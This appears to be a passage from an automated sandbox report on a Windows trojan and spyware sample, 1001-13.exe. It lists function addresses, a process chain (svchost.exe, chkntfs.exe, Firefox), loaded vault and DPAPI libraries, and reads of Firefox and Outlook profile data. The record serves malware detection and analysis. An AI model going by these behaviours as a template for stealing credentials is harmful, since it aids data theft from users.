Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0CB5 | 2_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362D34C | 2_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F132D | 2_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0368739A | 2_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E12ED | 2_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365B2C0 | 2_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036452A0 | 2_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367516C | 2_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362F172 | 2_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370B16B | 2_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364B1B0 | 2_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F70E9 | 2_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF0E0 | 2_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF0CC | 2_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036470C0 | 2_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF7B0 | 2_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03685630 | 2_2_03685630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F16CC | 2_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F7571 | 2_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037095C3 | 2_2_037095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DD5B0 | 2_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631460 | 2_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF43F | 2_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFB76 | 2_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B5BF0 | 2_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367DBF9 | 2_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365FB80 | 2_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B3A6C | 2_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFA49 | 2_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F7A46 | 2_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EDAC6 | 2_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DDAAC | 2_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03685AA0 | 2_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E1AA3 | 2_2_036E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03649950 | 2_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365B950 | 2_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D5910 | 2_2_036D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AD800 | 2_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036438E0 | 2_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFF09 | 2_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03603FD2 | 2_2_03603FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03603FD5 | 2_2_03603FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFFB1 | 2_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03641F92 | 2_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03649EB0 | 2_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F7D73 | 2_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03643D40 | 2_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F1D5A | 2_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365FDC0 | 2_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B9C32 | 2_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFCF2 | 2_2_036FFCF2
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_04653ADC | 7_2_04653ADC
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_04653C77 | 7_2_04653C77
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_04653C82 | 7_2_04653C82
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_046748B2 | 7_2_046748B2
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_0465592A | 7_2_0465592A
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_04655932 | 7_2_04655932
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_0465E1C2 | 7_2_0465E1C2
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_04655B52 | 7_2_04655B52
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_04653B32 | 7_2_04653B32
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_0465C3C2 | 7_2_0465C3C2
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe | Code function: 7_2_0465C3BD | 7_2_0465C3BD
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0493E4F6 | 8_2_0493E4F6
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04942446 | 8_2_04942446
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04950591 | 8_2_04950591
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04890535 | 8_2_04890535
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048AC6E0 | 8_2_048AC6E0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0488C7C0 | 8_2_0488C7C0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048B4750 | 8_2_048B4750
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04890770 | 8_2_04890770
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_049501AA | 8_2_049501AA
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_049481CC | 8_2_049481CC
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04880100 | 8_2_04880100
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0492A118 | 8_2_0492A118
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04918158 | 8_2_04918158
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_049102C0 | 8_2_049102C0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04930274 | 8_2_04930274
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_049503E6 | 8_2_049503E6
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0489E3F0 | 8_2_0489E3F0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494A352 | 8_2_0494A352
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04930CB5 | 8_2_04930CB5
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04880CF2 | 8_2_04880CF2
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04890C00 | 8_2_04890C00
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048A8DBF | 8_2_048A8DBF
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0488ADE0 | 8_2_0488ADE0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0489AD00 | 8_2_0489AD00
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494CE93 | 8_2_0494CE93
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048A2E90 | 8_2_048A2E90
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494EEDB | 8_2_0494EEDB
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494EE26 | 8_2_0494EE26
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04890E59 | 8_2_04890E59
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0490EFA0 | 8_2_0490EFA0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04882FC8 | 8_2_04882FC8
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0489CFE0 | 8_2_0489CFE0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048D2F28 | 8_2_048D2F28
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048B0F30 | 8_2_048B0F30
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04904F40 | 8_2_04904F40
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048768B8 | 8_2_048768B8
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048BE8F0 | 8_2_048BE8F0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0489A840 | 8_2_0489A840
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04892840 | 8_2_04892840
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048929A0 | 8_2_048929A0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0495A9A6 | 8_2_0495A9A6
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048A6962 | 8_2_048A6962
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0488EA80 | 8_2_0488EA80
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04946BD7 | 8_2_04946BD7
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494AB40 | 8_2_0494AB40
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494F43F | 8_2_0494F43F
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04881460 | 8_2_04881460
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0492D5B0 | 8_2_0492D5B0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04947571 | 8_2_04947571
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_049416CC | 8_2_049416CC
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494F7B0 | 8_2_0494F7B0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048970C0 | 8_2_048970C0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0493F0CC | 8_2_0493F0CC
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494F0E0 | 8_2_0494F0E0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_049470E9 | 8_2_049470E9
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0489B1B0 | 8_2_0489B1B0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C516C | 8_2_048C516C
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0487F172 | 8_2_0487F172
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0495B16B | 8_2_0495B16B
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048952A0 | 8_2_048952A0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048AB2C0 | 8_2_048AB2C0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_049312ED | 8_2_049312ED
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048D739A | 8_2_048D739A
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494132D | 8_2_0494132D
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0487D34C | 8_2_0487D34C
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494FCF2 | 8_2_0494FCF2
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04909C32 | 8_2_04909C32
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048AFDC0 | 8_2_048AFDC0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04893D40 | 8_2_04893D40
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04941D5A | 8_2_04941D5A
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04947D73 | 8_2_04947D73
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04899EB0 | 8_2_04899EB0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04891F92 | 8_2_04891F92
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494FFB1 | 8_2_0494FFB1
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494FF09 | 8_2_0494FF09
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048938E0 | 8_2_048938E0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048FD800 | 8_2_048FD800
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04899950 | 8_2_04899950
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048AB950 | 8_2_048AB950
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048D5AA0 | 8_2_048D5AA0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0492DAAC | 8_2_0492DAAC
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0493DAC6 | 8_2_0493DAC6
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04947A46 | 8_2_04947A46
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494FA49 | 8_2_0494FA49
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04903A6C | 8_2_04903A6C
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048AFB80 | 8_2_048AFB80
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_04905BF0 | 8_2_04905BF0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048CDBF9 | 8_2_048CDBF9
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0494FB76 | 8_2_0494FB76
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_005826A0 | 8_2_005826A0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0059C460 | 8_2_0059C460
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0057D4D8 | 8_2_0057D4D8
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0057D4E0 | 8_2_0057D4E0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0057B6E0 | 8_2_0057B6E0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0057D700 | 8_2_0057D700
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0057B830 | 8_2_0057B830
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0057B825 | 8_2_0057B825
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00585D70 | 8_2_00585D70
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00583F70 | 8_2_00583F70
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00583F6B | 8_2_00583F6B
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_045FE4B3 | 8_2_045FE4B3
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_045FE398 | 8_2_045FE398
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_045FE850 | 8_2_045FE850
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_045FD918 | 8_2_045FD918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 111 times
Source: C:\Users\user\Desktop\1001-13.exe | Code function: String function: 00E39CB3 appears 31 times
Source: C:\Users\user\Desktop\1001-13.exe | Code function: String function: 00E50A30 appears 46 times
Source: C:\Users\user\Desktop\1001-13.exe | Code function: String function: 00E4F9F2 appears 40 times
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 048FEA12 appears 86 times
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 0490F290 appears 105 times
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 0487B970 appears 272 times
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 048D7E54 appears 98 times
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 048C5130 appears 36 times
                Source: 1001-13.exe, 00000000.00000003.2144236729.00000000039C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1001-13.exe
                Source: 1001-13.exe, 00000000.00000003.2144392483.0000000003D2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1001-13.exe
                Source: 1001-13.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/8
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA37B5 GetLastError,FormatMessageW,0_2_00EA37B5
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E910BF AdjustTokenPrivileges,CloseHandle,0_2_00E910BF
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E916C3
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EA51CD
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EBA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EBA67C
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00EA648E
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E342A2
                Source: C:\Users\user\Desktop\1001-13.exeFile created: C:\Users\user\AppData\Local\Temp\outbluffedJump to behavior
                Source: 1001-13.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chkntfs.exe, 00000008.00000003.2812931265.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2812987116.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2814574961.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2814574961.0000000000B25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1001-13.exeVirustotal: Detection: 61%
                Source: 1001-13.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\1001-13.exe "C:\Users\user\Desktop\1001-13.exe"
                Source: C:\Users\user\Desktop\1001-13.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1001-13.exe"
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1001-13.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1001-13.exe"Jump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 1001-13.exeStatic file information: File size 1616384 > 1048576
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 1001-13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
